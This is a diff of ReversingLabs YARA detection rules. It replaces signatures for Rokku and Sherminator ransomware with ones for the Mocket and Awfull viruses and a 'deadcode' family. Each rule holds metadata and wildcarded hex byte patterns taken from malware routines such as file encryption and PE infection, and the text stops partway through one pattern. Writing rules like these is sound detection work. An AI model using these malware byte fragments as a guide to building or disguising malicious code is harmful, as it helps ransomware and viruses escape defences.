8B 36 00 00 AD 83 F8 FF 74 04 8B F0 EB F6 8B 7E 04 81 E7 00 00 FF + FF 66 81 3F 4D 5A 74 08 81 EF 00 00 01 00 EB F1 8B DF 03 5B 3C 66 81 3B 50 45 74 02 + EB E3 8B C7 C3 55 8B EC 8B 75 0C AC 84 C0 75 FB 2B 75 0C 8B CE 8B 5D 08 03 5B 3C 8B + 5B 78 03 5D 08 8B 53 20 03 55 08 2B C0 8B 32 03 75 08 8B 7D 0C 51 FC F3 A6 59 74 06 + } + $deadcode_body_2 = { + 83 C2 04 40 EB EB 8B 73 24 03 75 08 2B D2 66 8B 14 46 8B 73 1C 03 75 08 8B 04 96 03 + 45 08 8B E5 5D C2 08 00 55 8B EC 8B 7D 08 8B 75 0C 8B 4D 14 51 56 57 56 FF 75 10 E8 + 91 FF FF FF 5F 5E 59 AB AC 84 C0 75 FB E2 E9 8B E5 5D C2 10 00 8B 6C 24 04 6A 04 68 + 00 10 00 00 68 40 01 00 00 6A 00 FF 55 08 85 C0 74 18 89 45 78 E8 63 01 00 00 68 00 + 40 00 00 68 40 01 00 00 FF 75 78 FF 55 28 6A 00 FF 55 40 C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_*)) and ($drop_ransom_note) + uint16(0)==0x5A4D and ((($deadcode_ep_1 at pe.entry_point) and ($deadcode_marker at 0x40)) or (($deadcode_ep_2 at pe.entry_point) and ($deadcode_marker at 0x40)) or (($deadcode_ep_3 at pe.entry_point) and ($deadcode_marker at 0x40)) or ($deadcode_body_1 and $deadcode_body_2)) } -rule REVERSINGLABS_Win32_Ransomware_Rokku : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Mocket : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Rokku ransomware." + description = "Yara rule that detects Mocket virus." author = "ReversingLabs" - id = "8722ed4a-b480-57ec-bba7-ce7d0f3704b9" + id = "878c2162-9a79-52e6-af7b-95f9667f9e78" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Rokku.yara#L1-L147" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fefb342f8a9afac3b40c343b830f334225ff4198d55504846aa855acf5dfc9ba" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.Mocket.yara#L3-L58" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "af16974396efe7a1a46aa39b812482dcc49d0fe95db6640c1703db479e7ea9dc" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Rokku" + tc_detection_type = "Virus" + tc_detection_name = "Mocket" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files_p1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B E9 C7 44 24 ?? ?? ?? ?? ?? 33 DB 89 6C 24 ?? - 56 0F 57 C0 66 C7 44 24 ?? ?? ?? 57 66 0F 13 44 24 ?? B2 ?? 88 5C 24 ?? 8B CB 8A C1 - 02 C2 30 44 0C ?? 41 83 F9 ?? 73 ?? 8A 54 24 ?? EB ?? 8B CD 88 5C 24 ?? E8 ?? ?? ?? - ?? 8D 54 24 ?? 8B C8 E8 ?? ?? ?? ?? 85 C0 75 ?? 40 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 51 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B D6 E8 ?? ?? ?? ?? 59 56 BE - ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 4C 24 ?? 6A - ?? 8B D5 E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C1 8B 94 24 ?? ?? ?? ?? 0B C2 0F 84 ?? - ?? ?? ?? 6A ?? 5D 3B D3 77 ?? 81 F9 ?? ?? ?? ?? 76 ?? 2B CD 1B D3 52 51 55 8D 4C 24 - ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C5 0F 85 ?? ?? ?? ?? 8B CD 8B C3 8A 90 ?? ?? ?? ?? 49 - 8A B0 ?? ?? ?? ?? 3A D6 75 ?? 40 85 C9 75 ?? 8B CB EB ?? 0F B6 C6 0F B6 CA 2B C8 85 - C9 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 8B D6 50 B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 19 41 83 E8 ?? 75 ?? - 8B 6C 24 ?? 8B 7C 24 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 2B C7 1B CD 3B EB - } - $encrypt_files_p2 = { - 7C ?? 7F ?? 81 FF ?? ?? ?? ?? 72 ?? 8B AC 24 ?? ?? ?? ?? 0F 57 C0 8B BC 24 ?? ?? ?? - ?? 8B 4C 24 ?? 55 57 66 0F 13 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 59 59 8B 4C 24 ?? - 3B CB 77 ?? 3B C3 77 ?? 8B F3 EB ?? 3B CB 77 ?? 72 ?? 3D ?? ?? ?? ?? 72 ?? B8 ?? ?? - ?? ?? 55 57 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 88 ?? ?? ?? ?? 74 - ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 56 50 8B D0 E8 ?? ?? ?? ?? 55 57 56 BA ?? ?? ?? ?? - 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? 99 03 F8 13 EA E9 ?? ?? - ?? ?? 6A ?? 58 89 1D ?? ?? ?? ?? 83 E8 ?? 75 ?? 8B C7 89 1D ?? ?? ?? ?? 0B C5 BE ?? - ?? ?? ?? 74 ?? 51 8D 54 24 ?? E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 3B F1 74 ?? 56 51 BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 57 BD ?? ?? ?? ?? 8B D1 55 8D 4C 24 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? EB ?? BD ?? ?? ?? ?? 6A ?? 59 8B C1 BA ?? - ?? ?? ?? C6 02 ?? 42 83 E8 ?? 75 ?? B8 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 6A ?? - 58 B9 ?? ?? ?? ?? C6 01 ?? 41 83 E8 ?? 75 ?? C6 06 ?? 46 83 ED ?? 75 ?? 6A ?? 8D 44 - 24 ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? B1 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? 8B C3 30 4C 04 ?? 40 83 F8 ?? 73 ?? 8A 4C 24 ?? EB ?? 8B 4C 24 ?? 8D 54 24 ?? - 88 5C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B D6 E8 ?? - ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 33 DB 43 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B C3 EB ?? 8D 4C - 24 ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_files_p3 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 55 56 57 6A ?? 5E 56 BF ?? ?? ?? ?? 57 FF 15 - ?? ?? ?? ?? 51 BB ?? ?? ?? ?? BD ?? ?? ?? ?? 8B D3 8B CD E8 ?? ?? ?? ?? 59 56 57 FF - 15 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 C6 07 ?? 47 - 83 E8 ?? 75 ?? BF ?? ?? ?? ?? BA ?? ?? ?? ?? 53 8B CF E8 ?? ?? ?? ?? 59 6A ?? 58 C6 - 03 ?? 43 83 E8 ?? 75 ?? B9 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 3B E9 74 ?? 55 51 8B D6 - E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 51 8B D6 E8 ?? - ?? ?? ?? 83 C4 ?? 6A ?? 5B 53 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? B9 ?? ?? - ?? ?? 50 51 8B D3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? - 51 50 6A ?? 5A 8B C8 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 - ?? 50 51 8B D6 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 - 51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6A ?? 5B 3B C1 74 - ?? 50 51 8B D3 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 ?? 50 - 51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8B D7 50 8D 4C 24 ?? E8 ?? ?? ?? ?? - 59 BA ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 59 59 83 64 24 ?? ?? 83 EB ?? - 75 ?? 21 9C 24 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? 8B C6 C6 - 45 ?? ?? 45 83 E8 ?? 75 ?? C6 07 ?? 47 83 EE ?? 75 ?? 33 C0 5F 40 5E 5D 5B 8B E5 5D - C3 - } - $find_files_p1 = { - 55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 8B F0 66 C7 45 ?? ?? ?? 33 DB 89 35 - ?? ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? - ?? 66 C7 45 ?? ?? ?? 02 C8 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? 88 - 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D ?? - 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? - 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 - C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 - 05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 - 6A ?? 33 C9 C7 45 ?? ?? ?? ?? ?? 5B B0 ?? 88 5D ?? 32 C3 88 4D ?? 88 45 ?? 8B C1 C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 88 4D ?? 80 44 05 ?? ?? 40 83 F8 ?? 72 ?? 8B - 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 6A ?? 88 5D ?? B2 ?? 66 C7 45 - ?? ?? ?? 33 C9 66 C7 45 ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 5B 8D - 04 0A 30 44 0D ?? 41 3B CB 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 - ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 33 C9 C6 45 ?? ?? 58 34 ?? 88 4D ?? 88 45 + $mocket_body_1 = { + E8 00 00 00 00 5B 81 EB ?? ?? ?? ?? 8B 34 24 81 E6 00 00 FF FF E8 31 00 00 00 89 83 ?? ?? ?? ?? E8 4C 00 00 00 89 83 ?? + ?? ?? ?? E8 A2 00 00 00 E8 CD 00 00 00 E8 05 01 00 00 87 CB E3 0C B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 C3 66 81 3E 4D 5A + 75 0E 8B 7E 3C 03 FE 66 81 3F 50 45 75 02 96 C3 81 EE 00 00 01 00 81 FE 00 00 00 70 73 DD 33 C0 C3 8B 70 3C 03 F0 8B 76 + 78 03 F0 56 8B 76 20 03 F0 8B C6 33 D2 33 C9 8A 8B ?? ?? ?? ?? 8D BB ?? ?? ?? ?? 8B 34 02 03 B3 ?? ?? ?? ?? 83 C2 04 F3 + A6 75 E2 5E 8B C6 83 EA 04 D1 EA 8B 40 24 03 83 ?? ?? ?? ?? 33 C9 66 8B 0C 02 8B C6 8B 40 1C 03 83 ?? ?? ?? ?? C1 E1 02 + 8B 04 01 03 83 ?? ?? ?? ?? C3 8D BB ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 89 06 + 83 C6 04 B9 FF FF FF FF 32 C0 F2 AE 80 3F 90 75 DD C3 8D BB ?? ?? ?? ?? 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 + 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 C3 33 + C9 B1 03 8D BB ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? FF D0 E8 01 00 00 00 C3 C7 83 ?? ?? ?? ?? 00 00 00 00 8D 83 ?? ?? ?? ?? } - $find_files_p2 = { - B2 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D 04 0A 30 44 0D - ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? C6 45 ?? - ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 80 F3 ?? C6 45 ?? ?? 88 5D ?? 8D 55 ?? - 33 DB C6 45 ?? ?? 50 88 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 59 59 6A ?? 58 34 ?? C6 45 ?? ?? 88 45 ?? B2 ?? 88 5D ?? 8B CB C7 45 ?? ?? ?? ?? - ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? - 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? - 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 05 ?? ?? - 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? B0 ?? C6 45 - ?? ?? 34 ?? 88 5D ?? 59 88 45 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A - 4D ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 0F 28 05 - ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? 8A - 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? - E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3 + $mocket_body_2 = { + 50 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 40 0B C0 74 53 48 89 83 ?? ?? ?? ?? E8 48 00 00 00 FE 83 ?? ?? ?? ?? 80 + BB ?? ?? ?? ?? 0A 74 29 8D BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 32 C0 F3 AA 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? 50 8B 83 ?? + ?? ?? ?? FF D0 0B C0 75 C3 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 60 8D B3 ?? ?? ?? ?? 56 8B 83 ?? ?? ?? ?? FF + D0 89 83 ?? ?? ?? ?? 68 80 00 00 00 56 8B 83 ?? ?? ?? ?? FF D0 E8 B7 01 00 00 40 0B C0 0F 84 75 01 00 00 48 89 83 ?? ?? + ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 0F 84 4D 01 00 00 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 + 0F 84 26 01 00 00 89 83 ?? ?? ?? ?? 8B 70 3C 03 F0 66 81 3E 50 45 0F 85 F7 00 00 00 81 7E 4C 4B 43 4F 4D 0F 84 EA 00 00 + 00 8B 4E 3C 51 8B 46 28 89 83 ?? ?? ?? ?? 8B 46 34 89 83 ?? ?? ?? ?? FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? + ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 59 8B 83 ?? ?? ?? ?? 05 ?? ?? ?? ?? E8 5C 01 00 00 89 83 ?? ?? ?? ?? 91 E8 21 01 00 00 + 40 0B C0 0F 84 B9 00 00 00 48 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 1F 01 00 00 0B C0 0F 84 91 00 00 00 89 83 ?? ?? ?? } - $find_folders = { - 55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 DB 8B F0 66 - C7 45 ?? ?? ?? 89 35 ?? ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8D 45 ?? - 88 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D - ?? 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? 66 C7 45 ?? ?? ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 - ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 - ?? ?? ?? ?? ?? 88 45 ?? B2 ?? C7 45 ?? ?? ?? ?? ?? 8B CB 66 C7 45 ?? ?? ?? 88 5D ?? - 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 - 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 ?? ?? - ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 80 44 05 ?? - ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 66 C7 - 45 ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 80 44 - 05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 - 66 C7 45 ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 66 C7 45 ?? ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8B 0D ?? ?? - ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? B2 ?? C7 45 - ?? ?? ?? ?? ?? 8B CB C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D - 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D - 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3 + $mocket_body_3 = { + ?? 8B 70 3C 03 F0 8B FE 83 C6 78 8B 57 74 C1 E2 03 03 F2 0F B7 47 06 48 6B C0 28 03 F0 8B 56 10 8B CA 03 56 14 52 8B C1 + 03 46 0C 89 47 28 8B 46 10 05 ?? ?? ?? ?? 8B 4F 3C E8 EA 00 00 00 89 46 10 89 46 08 8B 46 10 03 46 0C 89 47 50 81 4E 24 + 20 00 00 A0 C7 47 4C 4B 43 4F 4D 8D B3 ?? ?? ?? ?? 5A 87 FA 03 BB ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 EB 0B 8B 8B ?? ?? ?? + ?? E8 41 00 00 00 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? + 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 61 C3 33 C0 50 50 51 FF B3 ?? ?? + ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 C0 50 50 6A 03 50 6A 01 68 00 00 00 C0 56 + 8B 83 ?? ?? ?? ?? FF D0 C3 6A 00 51 6A 00 6A 04 6A 00 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 51 6A 00 6A 00 6A + 02 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 D2 F7 F1 0B D2 74 01 40 F7 E1 C3 } condition: - uint16(0)==0x5A4D and ($find_folders and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*))) + uint16(0)==0x5A4D and ($mocket_body_1 at pe.entry_point) and $mocket_body_2 and $mocket_body_3 } -rule REVERSINGLABS_Win32_Ransomware_Sherminator : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Awfull : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Sherminator ransomware." + description = "Yara rule that detects Awfull virus." author = "ReversingLabs" - id = "99792a22-8027-557f-927f-30eac4d1e690" + id = "34104923-b401-5d39-883b-aa9a5a8e64f3" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sherminator.yara#L1-L157" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "22ac61b95f6ca4530e81a23fdd05be93e368647ca7100097a94eae3c6ce3b7d1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.Awfull.yara#L3-L33" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "84a4faee4cbbb3387ad25bd9230c6482b8db461bc008312bc782f23e3df2eae3" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sherminator" + tc_detection_type = "Virus" + tc_detection_name = "Awfull" tc_detection_factor = 5 importance = 25 strings: - $enum_resources_p1 = { - 55 89 E5 57 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 - ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? - ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C7 44 24 ?? - ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 54 - 24 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 - 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 - } - $enum_resources_p2 = { - 45 ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 - ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? 8B 15 ?? - ?? ?? ?? 8B 0D ?? ?? ?? ?? C1 E1 ?? 8D 1C 0A C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? - ?? ?? ?? 89 03 A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 00 85 C0 0F 84 ?? - ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 50 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? - ?? ?? C1 E1 ?? 01 C8 8B 00 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 - ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 10 89 D0 B9 ?? ?? ?? ?? 89 C3 B8 ?? ?? ?? ?? 89 DF F2 - AE 89 C8 F7 D0 83 E8 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 83 C0 ?? A3 ?? ?? ?? ?? - 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 83 E0 ?? 85 C0 74 ?? 8B 45 ?? C1 E0 - ?? 89 C2 8B 45 ?? 01 D0 89 04 24 E8 ?? ?? ?? ?? EB ?? 90 83 45 ?? ?? 8B 45 ?? 39 45 - ?? 0F 82 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? - ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 90 90 8D 65 ?? 5B 5F 5D C3 - } - $encrypt_files_p1 = { - 55 89 E5 57 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? - ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? - ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? 